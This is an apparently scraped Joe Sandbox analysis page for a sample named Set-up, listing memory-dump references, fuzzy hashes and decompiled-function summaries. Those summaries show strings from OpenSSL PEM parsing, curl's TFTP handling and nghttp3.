Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$CounterFrequency
String ID:
API String ID: 774501991-0
Opcode ID: f65cd8d5b95a3cc3d9ce5ec441d65acb2b7472e8629e3610cf4a5540c3ed6f61
Instruction ID: 179752a1251469edee29c6176d25fa7cbbfae30f78bef8c72802f18b8209bdd8
Opcode Fuzzy Hash: f65cd8d5b95a3cc3d9ce5ec441d65acb2b7472e8629e3610cf4a5540c3ed6f61
Instruction Fuzzy Hash: B8C1D671914B419BD722DF38C881BE6FBE1BFD9300F109A1EE5EA96241EB70B584CB51

Function 00876730 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: b4c881841b4b0239f490e47d6ed679a9f65d196450665d9e8a22f166af1012fb
Instruction ID: f746facd90c7c5ff3f140c7993042233fca6a9c8778165052a0dbc447e0175f9
Opcode Fuzzy Hash: b4c881841b4b0239f490e47d6ed679a9f65d196450665d9e8a22f166af1012fb
Instruction Fuzzy Hash: 1A81F572D14B928BD3148F24C8906B6BBA0FFDA314F249B1EE8EA46682F774D590C741

Function 008785A0 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction ID: 426bc05e164f6be0515ca1fa52ae3ee863b92774e559303df3b44cf5d05cfe82
Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction Fuzzy Hash: 5871E2751082068BC7199F6CD4C8169FBE1FF98354F29CA6DD99ACB346D634EC94CB80

Function 0088A800 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction ID: 1fa1e3687f7303c76eaf35240d7bcd98505faef1411d4fb12e8437fd125caf47
Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction Fuzzy Hash: 7171F4715082168BD719AF6CE5C0169FBE1FF88304F1A8B6ED999C7382D234EC95CB81

Function 00684170 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction ID: a36dde40db2521152e268a10d90a39e201473b0d4878aefb9ecec3a8f880e3ff
Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction Fuzzy Hash: 69513831B093424BD714AE5D84802AEB7D2FBAA324F2947BCD4DA8B342CA20DC07C781

Function 0088A610 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction ID: b78495cc4c6ea3bf77c4771af3dccfccc9b443e14c15ec2bd744ab64bd66cf86
Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction Fuzzy Hash: 6B519076A086258BD718AF19C1D0029FBE2FF88304F15C66ED9D9A7785C330AD64DBC2

Function 0089A000 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction ID: 4b641157f40a5bab67f04806a49e393719a916f0f3bf8b40ffe34563fc332c31
Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction Fuzzy Hash: 5231C43130871A8BCF18BD6DC8C022AF6D3EBE8750F59863CE589C3380E9718C5886C2

Function 007084A0 Relevance: 60.4, APIs: 24, Strings: 16, Instructions: 382stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 007085B6
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 007085CC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 007085E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 007085F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 0070860A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00708620
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00708634
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 0070864A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 0070865C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00708672
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 007086A0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 007086BA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 007086D0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 007086E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 007086FC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00708712
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 0070872A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00708686

Part of subcall function 006ECBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,006C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,006C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006ECBD2

Strings

X9.42 DH PARAMETERS, xrefs: 007085F2
CMS, xrefs: 007086F6, 00708724
X509 CERTIFICATE, xrefs: 0070861A
PKCS #7 SIGNED DATA, xrefs: 007086CA
PARAMETERS, xrefs: 007085DC, 007087FB
DH PARAMETERS, xrefs: 00708604
TRUSTED CERTIFICATE, xrefs: 00708680, 0070869A
ENCRYPTED PRIVATE KEY, xrefs: 00708740
crypto/pem/pem_lib.c, xrefs: 007084F6, 00708509, 0070851F, 00708545, 0070855A, 00708572, 007088CE, 00708935, 00708948, 0070895F, 00708977, 0070898C, 007089A5, 007089CB
NEW CERTIFICATE REQUEST, xrefs: 00708644
Expecting: , xrefs: 00708908
PRIVATE KEY, xrefs: 00708756, 00708787
PKCS7, xrefs: 007086B4, 007086DC, 0070870C
ANY PRIVATE KEY, xrefs: 007085C6
CERTIFICATE REQUEST, xrefs: 00708656
CERTIFICATE, xrefs: 0070862E, 0070866C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strcmp$free
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
API String ID: 3401341699-4246700284
Opcode ID: 00c6cd22e191d5753dc10ab2871eee52e0aab6158bb48ab67f07ddf13be1d1c5
Instruction ID: b606d7cfa392b63ca6b4ac7e10f3110fae053672d543554cb3b99089c704391f
Opcode Fuzzy Hash: 00c6cd22e191d5753dc10ab2871eee52e0aab6158bb48ab67f07ddf13be1d1c5
Instruction Fuzzy Hash: 51B1FEB1A44303E6DA517A205C03FAB36D86F61B5DF0C052CFA94E12E3FFA9D6158293

Function 00582010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0058204A
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00582068
WSAGetLastError.WS2_32 ref: 005820DE
recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0058214D
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00582365
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0058238F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 005823B9
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0058241D
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 005824AD

Strings

%s (%d) %s (%d), xrefs: 00582337
%s (%ld), xrefs: 005824D8, 00582557
tsize, xrefs: 0058248D
TFTP error: %s, xrefs: 0058228B
blksize parsed from OACK, xrefs: 00582332
Received too short packet, xrefs: 00582169
requested, xrefs: 0058232C
%s (%d), xrefs: 0058254A
Internal error: Unexpected packet, xrefs: 005822C4
Malformed ACK packet, rejecting, xrefs: 00582514
server requested blksize larger than allocated, xrefs: 00582552
tsize parsed from OACK, xrefs: 005824D3
got option=(%s) value=(%s), xrefs: 005823E8
blksize is smaller than min supported, xrefs: 00582545
blksize, xrefs: 005823FC
blksize is larger than max supported, xrefs: 0058253C
invalid tsize -:%s:- value in OACK packet, xrefs: 00582573
invalid blocksize value in OACK packet, xrefs: 0058251F

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 3302935713-3407012168
Opcode ID: b371db699d574b014437126079664fe3d35f61164243698628f5e30bf66e1285
Instruction ID: 9b2af3b3a55d83b30949eb380acfd2920049a7b1bd8a8820d658e6433cda50c3
Opcode Fuzzy Hash: b371db699d574b014437126079664fe3d35f61164243698628f5e30bf66e1285
Instruction Fuzzy Hash: 2BE11AB5A04302ABD710BB24DC55B2ABFE4FF94714F084968FC49A72D2EB74E944CB91

Function 005BA140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 005BA29A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 005BA2C5
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 005BA2E3

Part of subcall function 005BA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 005BA5FC

Strings

lblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 005BA527
lblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 005BA566
i < blk->n - 1, xrefs: 005BA4FD
rblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 005BA512
node->blk->n == NGHTTP3_KSL_MIN_NBLK, xrefs: 005BA4D3
n > 0, xrefs: 005BA53C, 005BA57B
nghttp3_ksl.c, xrefs: 005BA4CE, 005BA4E3, 005BA4F8, 005BA50D, 005BA522, 005BA537, 005BA54C, 005BA561, 005BA576, 005BA58B
i > 0, xrefs: 005BA4E8, 005BA590
rblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 005BA551

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy$memmove
String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
API String ID: 1283327689-1606465060
Opcode ID: 79591892702411978dbe0bd533fea896bf671085e173e581b25c58dfd7996028
Instruction ID: b319b37309069ee6200ead3b3a14d0cc4d42ba73945920a4dbacebd365b81b78
Opcode Fuzzy Hash: 79591892702411978dbe0bd533fea896bf671085e173e581b25c58dfd7996028
Instruction Fuzzy Hash: EFC1D2316443019FCB14DF18C8859AABBF5FF88300F548569F85A8B292E770FE85CB82

Function 005827E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00582AD7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00582B3D
sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00582D30
WSAGetLastError.WS2_32 ref: 00582D3A

Strings

Connected for receive, xrefs: 0058290B, 0058298A
TFTP finished, xrefs: 0058289C
Internal state machine error, xrefs: 005828C5
tsize, xrefs: 00582BAD
netascii, xrefs: 00582810, 00582B23
TFTP buffer too small for options, xrefs: 00582C60
0, xrefs: 00582B94
timeout, xrefs: 00582CD3
tftp_send_first: internal error, xrefs: 0058295C
TFTP filename too long, xrefs: 00582AF5
octet, xrefs: 0058280B
tftp.c, xrefs: 00582B03, 00582C6E, 00582D62
%s%c%s%c, xrefs: 00582B2A
blksize, xrefs: 00582C33
Connected for transmit, xrefs: 005829E0, 00582A34
%lld, xrefs: 00582B82

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$ErrorLastsendto
String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
API String ID: 3285375004-3063461439
Opcode ID: f877d334867b16e3f9d726d2d699ef034aab3e8b16b1c2ffc680c4ea4797a8e1
Instruction ID: 3283746f517f72f2ba6d93f3119965fc0ffb70a143039f61b37fce9ffb1907c4
Opcode Fuzzy Hash: f877d334867b16e3f9d726d2d699ef034aab3e8b16b1c2ffc680c4ea4797a8e1
